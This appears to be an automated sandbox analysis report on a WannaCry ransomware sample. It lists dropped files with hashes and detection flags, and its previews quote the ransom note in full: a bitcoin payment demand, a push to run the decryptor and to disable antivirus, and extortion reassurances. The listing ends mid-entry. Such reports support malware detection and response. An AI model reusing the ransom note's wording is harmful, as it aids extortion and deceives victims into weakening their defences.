                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.9985587459984195
                                Encrypted:true
                                SSDEEP:3072:l9HlK0QDmmWygJ6pOoLZVL2vOa9aoAScDc1ITlr7U:ldQim3gJ4LilanScUIlU
                                MD5:AA67DD611BE9603A12B8AA6770188F8E
                                SHA1:54A689B97312EB72A7FF43E8A9C924DE869E8E14
                                SHA-256:9CBCAC61524D42DE2314737F49EA148521A6885B29D463D8B5100C694D79EE5A
                                SHA-512:C784FCB02AE384F65AC42564436076FFDF896485D7C740E8408684CEA2F11D3B73C13C4A8951D3A24CD15DC2C288CCA2045A1CC0A578A36026E0CFBE6104830C
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999824442069547
                                Encrypted:true
                                SSDEEP:24576:eTnvanhIJDn1a2+mC1K80EBih1kw+YR16KCDEuAgVS4v8rEZ:wvsIJr1Z+hQ8tSawXWD671EZ
                                MD5:66C80BFE878B60EF486F4AA96EA0B5E6
                                SHA1:B9828E6F8AE37AA1326E0B9A2B1836B722D16589
                                SHA-256:1CA43A6BE8B3FC4AB9FCB1A74521A67FFBF9C35DCEAE8BF6B291A7072C15BDFF
                                SHA-512:F8FEF32AE302AA96A6696706B6D27DAC70567EC2541491D8F6B210FA55EDDC578B6FF10B739379D34CB43C306E24DFE0280F3ED6E49BACCA79498DF86A74E420
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999848948485185
                                Encrypted:true
                                SSDEEP:24576:kxUmWF/ZUf/2CU7Lk4Vdqb7O0xsgYkEDKrtSNa:JmWtZUI1YpoKrtCa
                                MD5:92C48F8AB7790677B166C17A2016DB8B
                                SHA1:8D56E618246C4DFC4DB3A8F87FB3E4B4744E0F71
                                SHA-256:A326ABDDF9893971DB48C88569EAFF6C2843AD53C40351062FD104500A09116B
                                SHA-512:02A6D138A6057E0A62310F164321A7498EF48723FC9DA1F712907FE46286039EF6FDFCA4CE099E3DDB5C5A11E256DF7B82D59D83BEB7C116AE670715C7F1CD87
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3656
                                Entropy (8bit):7.947234596187803
                                Encrypted:false
                                SSDEEP:96:o8z906WsE+PWZYdPuTE6Fr7/Q4ERUMHzU38A6DLm4Sw/AV6:lXOx+36oHHzE8f+4Swk6
                                MD5:2A4B8B847B8616F6D99E57CD476F2ADF
                                SHA1:583F32B01FF98C78C2F0F3C613F9337B988EFC44
                                SHA-256:C45F8FAAF6EB01683748B00339760A3F4E15C34FA22C8D2DEBE77EE22797CEA7
                                SHA-512:E0BE825CA33874104F9AC7B22E6896F889014EF9FE3A8A2D9D7A99A652DB0482C92EA7E744AA25304542C09B1D160856BE5C27D7A3A97CCBA364C17CEA729035
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.4212026683684575
                                Encrypted:false
                                SSDEEP:12:bkE0l5xj+nvXTeWEcQM4kFFDUgMJiSkQM0wYRIi/Jy:bk1IqWEfkFFDUJiD0wKy
                                MD5:5FBFB0E8F18854DE3B4C3881A1FC5BD2
                                SHA1:BD3321D21B7CD321271E4F090B932A1C1855D3F4
                                SHA-256:B683A531D4E821E42F197484DDE0935F8CAAC54CDDBDA72790917B38164A2EF0
                                SHA-512:1EDDEA59AEF70BAD004CE88ADB5925C490301291D1EB39FFD8F9271B9E58E8B19A455F74CE8DA173CDD8B6EDF8F22E5E60DE1DB3F8AA0CF8D3843DDC2710DAB0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):7.333060734811522
                                Encrypted:false
                                SSDEEP:6:bkEDn1nWt50C2AXAVmVo0x25faABWhy72GbW2L7zOCav1gI3yeOzgCLzJ88edmyd:bkEDnAskImEihyCOW2ba9nO8Cv+my0WF
                                MD5:870517DFFF4922E32A4B1B877942A644
                                SHA1:34AE8BEA85493A708F96946F873183D6227AB159
                                SHA-256:DFF45BD302BC4DE4A84C43ACB62538FE7799172F4C6E3A328AF1645432F4A5D4
                                SHA-512:4BA5714CAF59156322F1ED3CA947F2D62130C1D6110C9316F131972CD0EA8F9A6D1167EB7B9DCBC2FB2E19E74A3B6E5460A45FB49BB5B639900D8AA31AE4C62B
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3496
                                Entropy (8bit):7.951024188907682
                                Encrypted:false
                                SSDEEP:96:odRtpe6i9D55a7J0nPFrwLPwn4cr3uJs744:Tp5El0twLPwn4Y144
                                MD5:E2B8B33B761C2332D7D00FB15ECD2D67
                                SHA1:733D9C1A2C86137ACB343388F1619BD550C963E8
                                SHA-256:0503DF8E204D263840B006B5730E103A1E80A35A0073BF0DDB44D663D5C05E05
                                SHA-512:5332AB482712A7BCA1D945E7FE8F653FFF76213296EFC5CE411B043E2BF79D00C259542E0F0A5CECAEFBA22E812899B229F7172633A305F03E21755E91998F43
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):424
                                Entropy (8bit):7.4395960363451925
                                Encrypted:false
                                SSDEEP:12:bkEkid/BkFoWKpcHMDt3uRsyNqn24Tv4bYlCbybJj:bkQVQpKCHMDUVyTvE2Pj
                                MD5:6007F3D5E4347714CE9865DD41B3DB93
                                SHA1:FBCE3C4340FE3ED265B1ED3CCDE0F5EAE579AD88
                                SHA-256:9129C8C88FBC569DFBA49479511A7767B0BF093F7853F1F1DECE12B1BEB325C9
                                SHA-512:2135A50D190607794E20AF3F109AD73BD99E4ED9672456349CEB5F1229AC6EDC92DB9FF86046FBC7E7AB16E0A7B9BC8D51A85CF65DFA8C8CC2CD79DD83F70943
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):7.345844114067075
                                Encrypted:false
                                SSDEEP:6:bkEFSzQLij5oP+yXBAWIFJCB8b7QrKOmStib4abn0gq8rf4Szt+lXs9M2M8N8LxK:bkEoz0Y5o9mlFJV+jmStisN8cS4K91gk
                                MD5:FDEA1FFD63B00A7358B12EE787040E9F
                                SHA1:15DAE9DC95277657552A6A980BB0109C9B3D2C18
                                SHA-256:7498135834B21CFC6A6DC266A1F78033D1FE4DE03D39F90B7667890CBE9E9B52
                                SHA-512:A25A7EF5FB9D51CCDB70D64CB37BFD681D650DE0968C8E75A2810098B25D19079EB49F458E68EE4F6D44BCDB766369B13F33868C653925797B374E0DFC14DF77
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4200
                                Entropy (8bit):7.950124016583354
                                Encrypted:false
                                SSDEEP:96:ouhd3vZf5f7NbaNuPoYkTFMocrZcdXJFoD94UzcZHCLbp:H3v55f7NuNuPoY4X0i5FoeLo
                                MD5:240F83739A87D0D8532D73FE223864DC
                                SHA1:E1E782D87C1A1C212797F4648DE85597585C60F1
                                SHA-256:523B859971915CFDE1FCDB384AAAE8FAE1116EC5E28DBE09F202DD91E542824C
                                SHA-512:1C333992E83D70E966791BA1B9B3E54075E2D7EF9D0B9EBA3C64CDCA9473C745E40AE2787BA7C5B09AF8268B460D3DFD7097067426908AD0DD989FCD7BB290B1
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3688
                                Entropy (8bit):7.944624419053773
                                Encrypted:false
                                SSDEEP:96:optgk/e0m0tQUIGi4NUEtqB6kDfnTpNsQl0:SCCej0tQUIojcMUTpg
                                MD5:AF0D682B428E3F596381161E0E92965D
                                SHA1:228D08302ABAC95D830A73EC8E17EA41AA11930F
                                SHA-256:4B738FEC02C2642268EA62A9BED53C341A6D2DF216A6F5362ACB985C8F09356E
                                SHA-512:EB18A78DDE2A8E54260FD42344359E9D20DA834401D1B2154FD84799CEB70BCB72EAD5DA4DCCAA2770A84E11A8056DBFF2E84FF8CBE0DF5829C76F4B4EA6E93C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3688
                                Entropy (8bit):7.950896469844662
                                Encrypted:false
                                SSDEEP:96:onCZVeKAuVKprdcZ/2U1qQofdbbgqkrM5eEHQ9:aCZRAuMrKZ/v/Od3kr4eEw9
                                MD5:81831C045BB3B724CBA74B9614DBAB4C
                                SHA1:06DFC789AB51A59264E61201CFE8258524A0AC48
                                SHA-256:86515FA0B811B24E1905C6C824E22914DAE79518528B68904AD53E99119EE8E8
                                SHA-512:F38D4E2CE1E9A919A1F0229F99EAF5CDD5D56B8AF3550EDA39DED5D72DA499857BA59AE3DC26C9B9ADECCF70BE9B6D194E75713174D074D6435230F4FEB2EC36
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.509238129934189
                                Encrypted:false
                                SSDEEP:12:bkEdkU2niZo4DwTOmTA67a3BeFcp6ySYnXPF:bkE2iZlM6270Be6wbYnXPF
                                MD5:0DC2A6F1632B7419741A8AE5207AE5A6
                                SHA1:95CB184D71D83D48020FAC1C472F29DAFA20C7E9
                                SHA-256:6B9916CD736CA2604B5D281D7720BEDD85F73BFD45B0B5E21BE0A0CD8D8B64EB
                                SHA-512:27007D63B65E3063A5161B783E1072C848E2EA80420D134BEA84D873DDE039610742717FAD3891201630FB671CF0BE47A917BEF4F84BCE8C4CFC8B6DFC24A329
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):7.378143192292435
                                Encrypted:false
                                SSDEEP:6:bkEgIENAXnrQSf9EuIk1eiXx4LPw2O3jynXaB1WrLd+PT+ku6fHFNf6Fh9fzeQ:bkEgG7h9TeicwDywSY+kukHFNfWbd
                                MD5:969908734323B4B572440D0DE969A539
                                SHA1:C94564E67926BFC38C39CE1B501F93E1A51AEA05
                                SHA-256:6A99C6E29BDF073146B890C433E71BBDC6200E6E07646042EDD4A60561900818
                                SHA-512:695848990FBC2099CF68615A0D617A60A1189E701414A1BBD3D7DC1DBE010C9D529A138143EA3298E63D27227DD833CE353026ED2C5170C10CCBB48A182036AE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5272
                                Entropy (8bit):7.969590789315317
                                Encrypted:false
                                SSDEEP:96:of6fc+shmKBwtDcIpRUCQ7XtzJ/t81EmENC08OWmE44PpDWs53A0HTNsjOZFk:GTeVpRU7tJO8o08zZDCshAgTNGOZFk
                                MD5:13253234504AAE302DBCE84EC76504BA
                                SHA1:C9A4D524F55A7633CD981F7FFEAC257078255F6F
                                SHA-256:DE91DEADAB6253A44886425191A18E0FB28047AC1EB2620B468091C4CF41367C
                                SHA-512:938FBCFC2C13EC233635C4924E02B763BD83C546505D4808C30F1108795D17B8C3273AAA1AAB97C24CB376A01D626A4B7CCCC3E3D55DD29208A6D35D9195B4CE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):63944
                                Entropy (8bit):7.996984315811766
                                Encrypted:true
                                SSDEEP:1536:N9Wrw1griH9y+8PzjlypImI/kbI/SZtYlJL:N9LHAPN69IwIytkp
                                MD5:27E68C12B5CB769B5A08F0C7E9144B01
                                SHA1:57678C2D9613218BE50D39653C88E71CE7BAE3A7
                                SHA-256:F97FFE4A87040C7671AFBFF982FC48769F1A291B7545F194AD369592CB5B0CAD
                                SHA-512:88730C28F45A849F4371FF4B21BD1E88D6FBE99558AD8893E40DA9B4CAC0FE4843812871119915B8B66F166081149B685FED99F60BB39B176FBF5A5669B1D2DD
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):520
                                Entropy (8bit):7.545081023953532
                                Encrypted:false
                                SSDEEP:12:bkErrGzGvpD0vnsScmjjRfZYLvsMSKcY727OOVBf:bkCGc0/GmjjR2sMXcY72OI5
                                MD5:F9021173D5A03B0DAB1BB901D174FD72
                                SHA1:77FC99BA3375112B353C521EF3D234E48A60DBB1
                                SHA-256:1635205D122356DF0CD204E1C6FFFB5633A0D68164C03BC3067DA961D944B6D3
                                SHA-512:2CC29C319FE68DCD19F60BEF39152F1CF7E254C0CF8D0256FBF98BB3DE0CEC5198150059508433AF96072E2992450773C4F54ECD2AF915B1E0D8B94D698CFB61
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):544936
                                Entropy (8bit):7.999693070307019
                                Encrypted:true
                                SSDEEP:12288:EUkSdmc6UfnNNHzpE9pZo9wEDdY8R3cIaZOiZ42:E8YTUfvzpE9sRy8R3LaZOiW2
                                MD5:A3563AA00C1F6662321FD1835923328A
                                SHA1:114525445C1CD6977E4AC4FC7C3578848E894B80
                                SHA-256:44A338AFA0C9D217089B507AF3F7308F35EDF0FE9BB11B329E5D2F8FC934F973
                                SHA-512:331C0B037476CCFAE0F3110F3F17B1466C0422A841C3109FDC1C6B3553651897E4E6C035801BF1FF824ABA59A9E29F7602F09FA82583E525555DB2FC11CA31DE
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):261608
                                Entropy (8bit):7.999347630492373
                                Encrypted:true
                                SSDEEP:6144:oqOuCRyI0GmZDqKEc5K1gb4GZ9/wUDyBZkvAjVD/m:ob8I0GmZGicG//x+ZhS
                                MD5:8EA4C946607407FEF61444A9839CF377
                                SHA1:91AA46E5526721CB3858D6FE8ADDE860EE022B4C
                                SHA-256:22A965E559EAA5097250F745652BFC48965870686DC8CCABD5C1139C816D2B8D
                                SHA-512:2F51350741D4861983A9CE5D09A75E50AAE32A232B46C9A6B8F29A1DB1E440ABF53C22F863D6ECB2690B83E3425E8EF01AB4DABB61D684C3DE9713926541D48F
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):70648
                                Entropy (8bit):7.9974685316344685
                                Encrypted:true
                                SSDEEP:1536:GDy7nbUNWD+rfVUywynIqUgItZV+98YZotd9GJofl3:K2boBrfVBRf4Pc8vYJoN3
                                MD5:4B54938553E821937A85D810D4CE6551
                                SHA1:DA5669225108146D70A1DD943CC69B5B29E639FC
                                SHA-256:9229BFC2AFDA1474764041B602CEC0C928391533813008FE1D9327752830423F
                                SHA-512:7F282715087CE87DAF810D028866528706606B891BAE8C4C7138A38027DE107FA63809385127A97788D7D759F5B97306E44A6FC01B36F6430E15B268D2D8A4F6
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4648
                                Entropy (8bit):7.960382096816847
                                Encrypted:false
                                SSDEEP:96:oab2v91o7UcXVvXaAc/1SLYYqYz3v6wF9k0nqUwSkCsbqXm:xbwrE9aAc/ULyY7RzwgsbGm
                                MD5:76293CFA8162BC51CE8078CF4B59E617
                                SHA1:5DB5C759E2DF05CBE78B0E648C8536D522A4F3E5
                                SHA-256:2560BB99D355559DA02BB79D3B10EA0AFE76DC93717D261AF9BEA1C176D4D22D
                                SHA-512:8D812218DE25F6E3C6C8268101E4EE35A7D2D3F053C3E6A2F9031E8C9A670188F2D3AD448CAFE983E2FA965A6D3BB00A7F3C629CD79CBFD2A8A0D5682D892836
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):840
                                Entropy (8bit):7.726248385008958
                                Encrypted:false
                                SSDEEP:24:bk+JXEyhMRcp+4BFhRd6Cilf1IUqcNEF615LNc3lACZ6:bk+XHMcEsFylf+UvqY5LK3Z6
                                MD5:F4E5E41AE55D432C5B48D41A3474E9D8
                                SHA1:A566B7ACC10BAE6ACC5115018FA9ADB18AC17716
                                SHA-256:92AABF94E67173A88B7E911FE2B2B826920FBDEFB4713E6B8DA62EB4EF2DCE41
                                SHA-512:6698980A864637569E2116599C2A9DC911D5807F7213852CE4A8E5442BA757A70C3821A009495EF03DC79471ABB2D82D0BCEC4A33B06D037B7E1505159A422F9
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.379001327210586
                                Encrypted:false
                                SSDEEP:12:bkEUFy+uwRSayWLHHi0gkn3EHDbv1qV4uJ5+/sS/lj:bk/tRRZyCHi0gk3aUV4uL49j
                                MD5:5D6609E1D7B101BC8DF5E0288F3E764C
                                SHA1:CEAF4859A492635DA0E0A0AFAF76CEAEA33BC9E6
                                SHA-256:B3D99BFEE35C392D8F5AED2C58D77766ABC1A8E9F3957B1911A0A4048A0FDC48
                                SHA-512:5715848C48C05826AA27D9B415BA2E2BD5EE3AECF80524FDABCB3C914CBEB68137C39A9F03041671F7AC078DF2ED12BAEA60BD68F6B47E2F1640BC5930C84B83
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):536
                                Entropy (8bit):7.579242420519609
                                Encrypted:false
                                SSDEEP:12:bkEh9U1F9/s/AxX21lNnS/hIoEHy01NsUxdSosoYa:bk51Fps/As1lQJI9S01N9bS1oYa
                                MD5:082F0C2E0FA565C997DC25DC151F7154
                                SHA1:CEF3783E691115F0B001A1940A991AA407BB71CC
                                SHA-256:88C5BAF6D05337BE27B8EEBCC0E2CCF7EC9E3517A376DC754A0BF21990E37337
                                SHA-512:5803C7CA4EC25A5BF85F685E563DDC499B2EA7D6A94D907E50DA4C115EFE21EDF2ADEFC6712747722079662DBBEA272DA877EF42A3AD965083A71106D17DBE03
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.4450804807018125
                                Encrypted:false
                                SSDEEP:12:bkEJSQwswSzGPJDP9by0td0OiCPnKvhefZcoF7ir:bk+S6+4G0qSvhefZZlir
                                MD5:14B4FAF72EF9F935E4381E17E24F7B03
                                SHA1:60DB7A0F6E81D52CAD4EB5560801BDC0E914D886
                                SHA-256:5EB90C53DF276E215FB68876688E1E2E48143AD3F19223CAEF5692EEA69ACF36
                                SHA-512:57C94C7AE2E0A7C2AEC4A8692E697AC57E6495A4EE1F6C5B48DEA6BE8D85F9D65A7B144FAE181D5CC09A21B650E5EA11F26B629D0AA2BF3A89118933E31527FF
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):456
                                Entropy (8bit):7.483580549769791
                                Encrypted:false
                                SSDEEP:12:bkEYeucfUnjtPQG/1Q9vjFq1LaTWJK1MByEkTUurjCMN:bk6rwtBGRCaVfrGG
                                MD5:4C446866DA92CEB012CCC4D8CB85B84E
                                SHA1:CCB0202387B9BC38CDA11D2EDEB0C1742DA41D39
                                SHA-256:298E347384DC64F07F66647057C1AD96C20203E979D589587333325DAC2FBC5B
                                SHA-512:946BADC7E709E6C606E30CEF9581DAFFA1F0DE6A49F46E506E8BC35B69F2CB8997E12B3A7082FC8345C85A5E866A8AB19C43AEBCA6820CEAC2BD3F03BB6EFEDC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.4006367683976055
                                Encrypted:false
                                SSDEEP:12:bkEDd0lo4vWZFP5PA9+F43K8BWcc0QknY5+hjEWW69:bkM0WFnF46O+rknYMREB8
                                MD5:84B4ECE55D64DE87EAFEB30055EFB6EA
                                SHA1:AC67B516F010B188CA9B3EAA66DF94AACE84AB9A
                                SHA-256:1757E589E4AFF2B4083084621B6C6E90962EC9794A1C3431E57143342EC96ED7
                                SHA-512:095FCB1D05EAD7843A24CE0BAC0585DBFA27C7F4F9CA3ED8B47CDC76628975C9BE5220416ED4B806B538D37288BC0C2CA2F58567C35F59DA95B586DE28A165F3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2296
                                Entropy (8bit):7.916652308319594
                                Encrypted:false
                                SSDEEP:48:bkQNHIkveRytvVZlrM1Fw2t9C2QxGWaB7IQJcQXQmNC3L6zb:ogNXvVLrMH3bCnlANzgCc6P
                                MD5:DCC7CE6CC70633E69DE5BB6D897EE987
                                SHA1:5EF46FE87B34906045C3BD3914A1F0A767DC70CD
                                SHA-256:A35291A9C5BA601901074DFBF648ABECE4072332C3AE8DF1241DEBCF9280D806
                                SHA-512:D35D8563104E8408D879ACD347126D29105937EE437F3290D54A4D82444C47771335B9F1C25615615E227F8BFC2AFFCFB40A8F868CB667F31F09BDE3FCFB5808
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):7.341760054084926
                                Encrypted:false
                                SSDEEP:6:bkErE2pWl0FNYyVol2KnK7t9xp5jz4TNg/Fnqsdte8/0nVPq/1kZI0n:bkEvWy2psjUTu/FXfe8cRq/1kZI0n
                                MD5:24E21FE39418032433BE835166A45221
                                SHA1:7DFA0E9620CEE1870E6591E8C5B95AE800FD1A7B
                                SHA-256:7B6FF82883964F51C23FBEA9C743CFDC0636E3B63F0F2482CC07DD59E5B9D5EB
                                SHA-512:C58724A4230F6827F7377B4220159889F79794890F57772AB3C77C7CCDEEF496314B07A61571F4CE789BA688C5AEF1C151A025ECA9F66BB31FE3CAA6C8B06760
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28952
                                Entropy (8bit):7.992489080804419
                                Encrypted:true
                                SSDEEP:768:7HqU1oxtWjfFmqVIKDrSf4IrCZirv/4pK5AReiAIho:7HqU6xMNmKIKDef4ViT/4pGOAIW
                                MD5:8ECE7E89E85B8198AF562B5761C3509E
                                SHA1:9A9033A56CB7FC4D39BE0E6D009EBC0117C74A5C
                                SHA-256:1E6DFE5A1060405E31864A86DFE15BB9B54CE4081823D4CC5DB79CBFCB35CB54
                                SHA-512:9F9840E46E930FC35EBB0B7B8069BE9EB5A968E5E73B18823208B1AC5CB41F704BDA3A2593ECA9DA935592D988A25693D4B9B6C2F8242432E78752DEF08B7465
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.988451241531449
                                Encrypted:false
                                SSDEEP:384:8CWxTroO4eXvRngvHHFZ2vY/ixfexyV5PubkC5vu:mTMOzXlqH2vX8E5PuQmu
                                MD5:6790291A332E27F9BE5B745188AEAC31
                                SHA1:F63CF941875103FF043B5D34FDBC129B5B496856
                                SHA-256:F663D05D7F9527BF16DCCE31C9F9563278394E0BCBADA56E98D5975F496D0083
                                SHA-512:9481F4C2A1F24311F3146B78468DDDC793CC9DDB8A2204739A353672B1C6031C6CDA77EBB4D1131D11BBE33CD38E19013DF1895E870775F0F3BE27A3FB3847EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24904
                                Entropy (8bit):7.991995403764266
                                Encrypted:true
                                SSDEEP:768:QW8F9ZP+1WNaslWRk4tjuX4RvWXoLQk7ac:QsWNasEtjuX4pM4
                                MD5:E77D6A2A97C62693C0429839DD5D0139
                                SHA1:08EA962F59FB43239094301BC7F4998FF4E29D20
                                SHA-256:0D3B4403EB61F7BBADA12A422A06E37D550F79B92CA290C039AC164FDFE6B0A9
                                SHA-512:D498F6FC0DE6A4680D92D861106EC4167926F2C5FE6C9BE4973BE2537BBA43776A32DDAE4FDBCEA840019E2536F722B39C2B1D9379FA079F09EC3B37A71B6B07
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):277304
                                Entropy (8bit):7.999336732929792
                                Encrypted:true
                                SSDEEP:6144:djsQfYj/Hbz3sj6HjDN4ywoDuf1ZMt1ocXno7os+zS:dFQj/XcjujZ4lx1s4+zS
                                MD5:7168FACC3FCC45A39607976113136A3B
